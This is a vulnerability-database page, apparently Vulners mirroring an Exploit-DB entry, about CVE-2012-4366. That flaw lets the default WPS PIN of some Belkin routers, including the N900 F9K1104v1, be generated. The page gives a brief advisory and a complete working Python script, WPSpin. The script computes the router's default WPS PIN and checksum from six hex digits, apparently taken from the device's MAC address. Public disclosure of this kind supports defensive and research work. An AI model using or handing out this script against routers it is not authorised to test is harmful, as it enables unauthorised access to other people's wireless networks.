Lucene search
+L

Belkin Wireless Router - Default WPS PIN Security

🗓️ 03 Jan 2013 00:00:00Reported by ZhaoChunshengType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Belkin Wireless Router has a security vulnerability allowing attackers to generate default WPS PIN which can lead to other attacks

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-4366
3 Jan 201300:00
circl
cve
CVE
CVE-2012-4366
20 Nov 201200:00
cve
cvelist
Cvelist
CVE-2012-4366
20 Nov 201200:00
cvelist
euvd
EUVD
EUVD-2012-4309
17 May 202201:42
euvd
nvd
NVD
CVE-2012-4366
20 Nov 201200:55
nvd
prion
Prion
Design/Logic Flaw
20 Nov 201200:55
prion
prion
Prion
Design/Logic Flaw
31 Dec 201220:55
prion
redhatcve
RedhatCVE
CVE-2012-6371
22 May 202512:13
redhatcve
securityvulns
securityvulns
CVE-2012-4366: Insecure default WPA2 passphrase in multiple Belkin wireless routers
26 Nov 201200:00
securityvulns
securityvulns
securityvulns
Belkin wireless routers weak key
26 Nov 201200:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/57128/info

Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN.

Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.

Belkin N900 F9K1104v1 is vulnerable; other versions may also be affected.

@author       : [email protected]
Original work : ZhaoChunsheng 04/07/2012

'''

import sys

VERSION    = 0
SUBVERSION = 2

def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)

def wps_pin_checksum(pin):
    accum = 0

    while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10

try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
except Exception:
    usage()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 23.3
EPSS0.04576
31